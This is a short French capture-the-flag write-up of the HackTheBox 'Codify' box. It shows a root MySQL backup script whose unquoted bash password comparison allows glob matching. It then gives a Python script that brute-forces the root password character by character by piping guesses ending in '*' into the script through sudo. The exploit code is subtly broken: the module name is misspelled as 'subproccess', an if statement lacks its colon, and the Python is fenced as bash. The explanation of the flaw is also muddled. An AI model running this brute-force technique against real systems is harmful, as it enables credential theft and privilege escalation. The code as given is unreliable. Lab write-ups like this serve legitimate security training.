Dans un script bash, quelques "erreurs" peuvent devenir exploitables. ### Comparaison (box "codify" sur HTB): ```bash #!/bin/bash DB_USER="root" DB_PASS=$(/usr/bin/cat /root/.creds) BACKUP_DIR="/var/backups/mysql" read -s -p "Enter MySQL password for $DB_USER: " USER_PASS /usr/bin/echo if [ $DB_PASS == $USER_PASS ](%20$DB_PASS%20==%20$USER_PASS%20); then /usr/bin/echo "Password confirmed!" else /usr/bin/echo "Password confirmation failed!" exit 1 fi /usr/bin/mkdir -p "$BACKUP_DIR" databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)") for db in $databases; do /usr/bin/echo "Backing up database: $db" /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz" done /usr/bin/echo "All databases backed up successfully!" /usr/bin/echo "Changing the permissions" /usr/bin/chown root:sys-adm "$BACKUP_DIR" /usr/bin/chmod 774 -R "$BACKUP_DIR" /usr/bin/echo 'Done!' ``` La partie ```if [ $DB_PASS == $USER_PASS ](%20$DB_PASS%20==%20$USER_PASS%20); then``` est problématique : du fait de l'absence de double quote, la comparaison ne se fait pas sur une string complète, mais sur une valeur, on peut donc arriver à un résultat de type ```if password123 == *, then``` au lieu de ```if "password" == "*" then``` ce qui entraine une faille de sécurité. Il devient possible de bruteforcer le mot de passe attendu, avec un script de ce type : ```bash import string import subproccess def check_password(p): command = f"echo '{p}*' | sudo /opt/scripts/mysql-backup.sh" result = subprocess.run(command, shell=True, stdout=subproccess.PIPE, stderr=subproccess.PIPE, text=True) return "Password confirmed!" in result.stdout charset = string.ascii_letters + string.digits password = "" is_password_found = False while not is_password_found: for char in charset: if check_password(password + char) password += char print(password) break else: is_password_found = True ```